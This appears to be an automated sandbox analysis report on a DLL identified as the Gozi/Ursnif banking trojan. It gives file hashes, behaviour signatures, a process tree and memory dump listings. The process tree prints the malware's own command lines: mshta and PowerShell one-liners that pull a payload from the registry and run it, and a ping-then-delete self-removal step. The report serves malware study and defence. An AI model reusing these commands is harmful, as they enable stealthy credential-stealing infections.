Overview

overview

10

Static

static

machine.dll

windows7_x64

10

machine.dll

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    02-10-2020 18:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    machine.dll

  • Size

    46KB

  • MD5

    f66ff9ac0e1dc028de92aaa3255daf81

  • SHA1

    5455fadda6480468034eb65a0e58afff69a63aba

  • SHA256

    88c3ec0d56ce1c6ea8763ced6993e704e73b3fd105f40a142bc310fcd6efc77d

  • SHA512

    2d1fdae8b67aa8f3180a8ed347315053b09b20fa2bf90738af39b32a47fb2d5dc84c61d187e61566e826a6d05f9a80346f6a02c581b04c6d808dc7bb65bf8294

Score
10/10
bankertrojangozi_ifsbursnifspyware

Malware Config

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • ServiceHost packer 1 IoCs

    Detects ServiceHost packer used for .NET malware

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of SetThreadContext 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
    adwarespyware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1463 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\machine.dll,#1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:792
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\machine.dll,#1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:588
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\njutz3iw\njutz3iw.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:392
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDFB.tmp" "c:\Users\Admin\AppData\Local\Temp\njutz3iw\CSC34AE8873DFE94D97929E67E09961C0DF.TMP"
            5⤵
              PID:2548
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3xljiwjd\3xljiwjd.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4048
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED6.tmp" "c:\Users\Admin\AppData\Local\Temp\3xljiwjd\CSC2AB5BD6C35E1419ABAA46AF15F53BAE0.TMP"
              5⤵
                PID:1920
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\machine.dll"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2976
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\3D79.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3816
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:1244
          • C:\Windows\system32\cmd.exe
            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3D79.bi1"
            2⤵
              PID:2304
            • C:\Program Files\Windows Mail\WinMail.exe
              "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
              2⤵
                PID:3648
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
                PID:3336
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                1⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:692
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:82945 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:1252
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                1⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2196
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2196 CREDAT:82945 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2880
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2196 CREDAT:82953 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3744

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/576-33-0x000001B166FA0000-0x000001B167051000-memory.dmp

                Filesize

                708KB

                Download

              • memory/588-31-0x00000000738E0000-0x00000000738F0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2060-5-0x00007FFED0920000-0x00007FFED130C000-memory.dmp

                Filesize

                9.9MB

                Download

              • memory/2060-15-0x000001C3CB1F0000-0x000001C3CB1F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2060-7-0x000001C3E57A0000-0x000001C3E57A1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2060-25-0x000001C3E5820000-0x000001C3E58D1000-memory.dmp

                Filesize

                708KB

                Download

              • memory/2060-6-0x000001C3CB1C0000-0x000001C3CB1C1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2060-23-0x000001C3CB210000-0x000001C3CB211000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2964-29-0x0000000004F20000-0x0000000004FD1000-memory.dmp

                Filesize

                708KB

                Download

              • memory/2964-27-0x0000000004F20000-0x0000000004FD1000-memory.dmp

                Filesize

                708KB

                Download

              • memory/2964-41-0x0000000004F20000-0x0000000004FD1000-memory.dmp

                Filesize

                708KB

                Download